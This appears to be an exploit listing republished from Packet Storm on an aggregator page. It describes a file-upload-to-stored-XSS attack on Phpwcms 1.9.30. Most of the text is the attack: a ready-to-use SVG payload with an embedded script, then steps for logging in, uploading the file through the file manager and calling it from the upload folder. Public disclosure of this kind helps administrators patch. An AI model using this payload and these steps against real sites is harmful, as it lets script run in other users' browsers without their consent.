Exploit for Phpwcms 1.9.30 Cross Site Scripting

Name: Exploit for Phpwcms 1.9.30 Cross Site Scripting
Rating: 5 (222 reviews)

2021-10-01 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:164356
# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS  
# Date: 30/9/2021  
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr  
# Software Link: http://www.phpwcms.org/  
# Version: 1.9.30  
# Tested on: Ubuntu 16.04  
  
Steps:  
  
1-) You need to login to the system.  
http://target.com/phpwcms/login.php  
  
2-) Creating payload with SVG extension: payload.svg  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />  
<script type="text/javascript">  
alert("XSS!");  
</script>  
</svg>  
  
  
3-) Go to the following link and upload the payload:  
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8  
  
From the menu:  
  
file -> multiple file upload -> Select files or drop here  
  
4-) After uploading payload, call it from the link below.  
  
http://192.168.1.112/phpwcms/upload/